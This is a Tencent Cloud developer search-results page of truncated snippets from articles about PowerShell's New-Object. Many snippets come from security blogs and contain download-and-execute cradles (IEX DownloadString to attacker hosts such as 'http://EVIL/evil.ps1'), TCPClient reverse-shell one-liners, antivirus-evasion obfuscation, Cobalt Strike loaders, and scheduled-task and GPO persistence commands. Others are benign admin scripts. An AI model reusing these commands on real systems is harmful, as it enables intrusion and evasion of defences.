文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
    时间不限
    最近一周
    最近一月
    最近三月
  • 来自专栏文渊之博

    如何利用powershell 访问sqlserver

    = 'SecretPassword' $SqlQuery = 'Select * FROM TestTable' # Accessing Data Base $SqlConnection = New-Object System.Data.SqlClient.SqlDataAdapter $SqlAdapter.SelectCommand       = $SqlCmd $set = New-Object data.dataset Server = '"WIN-AHAU9NO5R6U\DOG"' $UserName = 'kk' $Password = '123456' #创建连接对象 $SqlConn = New-Object Initial Catalog=$Database;Integrated Security=SSPI;" #打开数据库连接 $SqlConn.open() #执行语句方法一 $SqlCmd = New-Object System.Data.SqlClient.SqlDataAdapter $SqlAdapter.SelectCommand = $SqlCmd $set = New-Object data.dataset

    1.2K50编辑于 2022-05-06
  • 来自专栏七夜安全博客

    APT的思考: PowerShell命令混淆高级对抗

    Inv`o`ke-Ex`pr`e`s`sion (`New-Object `System. Invoke-Expression (New-Object System.Net.WebClient).' IEX (New-Object Net.WebClient).("DownloadString").Invoke("http://127.0.0.1:8899/qiye.txt") 4. IEX (New-Object Net.WebClient). ($ExecutionContext.InvokeCommand.NewScriptBlock('IEX (New-Object Net.WebClient).

    7.1K52发布于 2020-06-05
  • 来自专栏FreeBuf

    Powershell免杀从入门到实践

    以落地为例 powershell -ExecutionPolicy bypass -File a.ps1 以不落地为例,如我们熟知的IEX powershell -c "IEX(New-Object /a') | powershell - 如: powershell -c "IEX(New-Object Net.WebClient).DownloadString('d://a')" 简单混淆 powershell Net.WebClient).DownloadString("http://109.xx.xx/a") ^|%p1%%p2% -" 如: echo Invoke-Expression (New-Object 客户端执行命令: powershell -c "$client = New-Object Net.Sockets.TCPClient('106.xxx.xxx.xxx',9090);$stream = $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("xxx"));IEX (New-Object IO.StreamReader(New-Object

    3.3K30发布于 2021-03-09
  • 来自专栏潇湘信安

    powershell上对抗360与火绒的技巧

    0x02 powershell免杀绕过360与火绒上线 powershell免杀绕过思路参考: 安全客原始payload Invoke-Expression (New-Object Net.WebClient ("ht"+"tp://9821.ink/xxx") 变量代替 IEX$wc=New-Object Net.WebClient;$wc.DownloadString('h'+'ttp://9821.ink Invoke-Expression (New-Object Net.WebClient)." Down`loadString"('h'+'ttp://9821.ink/xxx') 同样可以使用在Net.Webclient上 Invoke-Expression(New-Object "`Ne`T 修改后的命令: powershell -c "IEX(New-Object Net.WebClient)."

    2.3K31发布于 2021-07-28
  • 来自专栏中国白客联盟

    渗透测试中常用powershell(一)

    端口扫描 针对单个IP的多端口扫描 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("127.0.0.1",$_)) "Port Jumbo\Desktop>whoami whoami desktop-ej8rt6l\jumbo 导出rdp/winscp/putty/FileZilla会话与密码 powershell IEX (New-Object NC反弹 powershell "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command "calc.exe" -verbose 文件下载 powershell (new-object 拷贝system/ntds powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com

    2.1K40发布于 2019-03-07
  • 来自专栏黑白天安全团队

    一些有趣的powershell加载命令

    普通下载 IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") PowerShell 3.0+ IEX (iwr ' http://EVIL/evil.ps1') 隐藏的IE com对象 $ie=New-Object -comobject InternetExplorer.Application; $ie.visible evil.ps1'); start-sleep -s 5; $r=$ie.Document.body.innerHTML; $ie.quit(); IEX $r Msxml2.XMLHTTP COM对象 $h=New-Object $ h = new-object -com WinHttp.WinHttpRequest.5.1; $ h.open('GET',' http://EVIL/evil.ps1',$false); $ > <command> <execute>Get-Process</execute> </command> #> $a = New-Object System.Xml.XmlDocument

    1.8K10发布于 2021-03-16
  • 来自专栏鸿鹄实验室

    Bypass Windows Defender Reverse Shell

    " PS C:\Users\Administrator> Write-Host $replace 0x02 实战bypass 我们以反弹shell代码为例,实战bypass,代码如下: $sm=(New-Object ',55555)).GetStream(); [byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){; $d=(New-Object 仔细观察代码,我们可以尝试更改其中的敏感词,比如变为下面这样: $sm=(New-Object Net.Sockets.TCPClient('192.168.2.114',4444)).GetStream (); [byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){; $d=(New-Object Text.ASCIIEncoding $sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close() $client = New-Object

    1.4K40发布于 2021-04-15
  • 来自专栏潇湘信安

    sqlps.exe白名单的利用(过S60!)

    已被拦截: powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120 /360.ps1'))" SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120 绕过方式: SQLPS1 -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/ 360.ps1'))" cmd /c SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120 @shell output exec sp_oamethod @shell,'run',null,'C:\ProgramData\SQLPS.exe -nop -w hidden -c "IEX ((new-object

    1.5K10编辑于 2022-04-01
  • 来自专栏鸿鹄实验室

    powershell使用udp获取数据

    nc -lnvup 53 powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object powershell -c "whoami | % {$w=(New-Object System.IO.StreamWriter((New-Object System.Net.Sockets.TCPClient

    2.3K30发布于 2021-04-15
  • 来自专栏FreeBuf

    分析银行木马的恶意快捷方式及混淆的Powershell

    echo iEx(iEx(NEw-obJect NeT.wEbcLient).downLOadStRiNG('https://s3-eu-west-1.amazonaws.com/juremasobra2 function downloadFileAndWriteToFile(${url}, ${argumentList}) { ${uri} = New-Object $('System.Uri' -TypeName System.IO.FileStream -ArgumentList ${argumentList}, Create ${arrayToWrite} = new-object function _/=\/\_/\/===\_/== { try { ${_/======\_/\/=\/\} = New-Object System.Threading.Mutex( function mutexCheck { try { ${threadingMutex} = New-Object System.Threading.Mutex($false, $('

    2K20发布于 2019-11-12
  • 来自专栏ConsT27的笔记

    Windows内网渗透常用命令总汇

    besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd powershell IEX (New-Object ;$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)} (豪华版) $client = New-Object [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object "";document.write();r=new%20ActiveXObject(""WScript.Shell"").run(""powershell -w h -ep bypass `$sm=(New-Object net.webclient).downloadstring('http://xxx/a.ps1')) powershell -exec bypass -c "(New-Object Net.WebClient

    2.2K30编辑于 2022-02-11
  • 来自专栏黑白天安全团队

    Cobalt Strike Powershell 过360+Defender等杀软上线

    System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod( System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod( IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, IO.MemoryStream(,$var_code);IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, IO.MemoryStream(,$var_code);$a1='IEX (New-Object IO.Strea123'.Replace('123','mRe');$a2='ader(New-Object

    3.2K20发布于 2020-11-03
  • 来自专栏运维开发王义杰

    windows: 通过普通域用户凭据远程修改其他用户密码

    密码修改 $username = "wang\w" $password = ConvertTo-SecureString "3" -AsPlainText -Force $credentials = New-Object username = "wang\yijie" $password = ConvertTo-SecureString "3" -AsPlainText -Force $credentials = New-Object $username = "wang\yijie" $password = ConvertTo-SecureString "3" -AsPlainText -Force $credentials = New-Object 这是通过New-Object cmdlet与System.Management.Automation.PSCredential类实现的。 $username = "wang\w" $password = ConvertTo-SecureString "3" -AsPlainText -Force $credentials = New-Object

    1.2K40编辑于 2023-11-07
  • 来自专栏网络安全攻防

    Windows环境下反弹shell各类姿势

    在攻击端一侧使用python托管一个powershell文件 python2 -m SimpleHTTPServer 1234 Step 3:目标机反弹cmdshell powershell IEX (New-Object lnvp 4444 Step 2:在攻击端一侧使用python托管文件 python2 -m SimpleHTTPServer 1234 Step 3:反弹shell操作 powershell IEX (New-Object lup 6666 Step 2:在攻击端一侧使用python托管文件 python2 -m SimpleHTTPServer 1234 Step 3:反弹shell操作 powershell IEX (New-Object icmp包 python2 icmpsh_m.py 192.168.204.144 192.168.204.145 #开启监听 Step 3:反弹shell操作 powershell IEX (New-Object [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object

    2.2K11编辑于 2025-01-07
  • 来自专栏Windows技术交流

    初始化组件≤cloudbase-init1.1.2的机型A的机器做了自定义镜像买机型B的机器,新机器网络初始化异常的bug如何规避

    add "HKLM\SYSTEM\CurrentControlSet\Control\Network\NewNetworkWindowOff" /f 2>&1 > $null $client = new-object remove "PCI\VEN_1AF4&DEV_1000&SUBSYS_00011AF4&REV_00" ②升级cloudbase-init到1.1.4(需要机器能访问公网) #ps1 $client = new-object 1 > $null sc.exe qc cloudbase-init 8192 net user cloudbase-init /del 2>$null #$client12 = new-object 1251783334.cos.ap-guangzhou.myqcloud.com/ziyan/Cloudbase-Init.zip','C:\Cloudbase-Init.zip') #$client14 = new-object Cloudbase-Init.zip') $7zPath = "$env:ProgramFiles\7-Zip\7z.exe" if (-not (Test-Path -Path $7zPath)) { $client7 = new-object

    34510编辑于 2025-01-14
  • 来自专栏信安之路

    利用计划任务维持系统权限

    WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object

    1.4K30发布于 2021-05-27
  • 来自专栏全栈工程师修炼之路

    PS对象处理操作常用命令

    命令 - 创建新的对象 描述: 通过New-Object cmdlet 创建Microsoft.NET Framework或COM对象的实例,您可以指定.NET Framework类的类型(缺省)或COM PS > $obj = New-Object object #空对象 # 1.通过String类输入字符和数字创建一个包含指定个数字符的字符串 PS > New-Object String("*", $IE2 = New-Object -COMObject InternetExplorer.Application` $IE2.Navigate2("www.microsoft.com")` $IE2. New-Object -ComObject WScript.Shell New-Object -ComObject WScript.Network New-Object -ComObject Scripting.Dictionary New-Object -ComObject Scripting.FileSystemObject Add-Member 命令 - 向PowerShell对象的实例添加自定义属性和方法。

    10.7K11编辑于 2022-09-29
  • 来自专栏FreeBuf

    如何通过用户的编辑权限控制组策略对象(GPO)控制的对象

    AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I EX ((new-object

    1.8K20编辑于 2023-04-26
  • 来自专栏Windows技术交流

    腾讯云使用powershell自动安装配置windows cloudbase-init 1.1.6做自定义镜像

    2008R2,1.1.4和1.1.6都不适用) Set-executionpolicy -ExecutionPolicy Unrestricted -Scope CurrentUser -Force; (New-Object cloudbase-init1.1.6.ps1 安装TAT Set-executionpolicy -ExecutionPolicy Unrestricted -Scope CurrentUser -Force; (New-Object tat_agent_installer.exe 安装云监控组件 Set-executionpolicy -ExecutionPolicy Unrestricted -Scope CurrentUser -Force; (New-Object

    41810编辑于 2025-08-21
  • 来自专栏jiajia_deng

    Windows Sysinternals 工具自动更新脚本

    ToolsLocalDir){ cd $ToolsLocalDir $DebugPreference = "SilentlyContinue" $wc = new-object *" $WebPageCulture = New-Object System.Globalization.CultureInfo("en-us") $Tools $NeedUpdate=$false if (Test-Path $_) { $SubtractSeconds = New-Object

    44320编辑于 2023-10-21
第 2 页第 3 页第 4 页第 5 页第 6 页第 7 页第 8 页第 9 页第 10 页第 11 页
点击加载更多

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

领券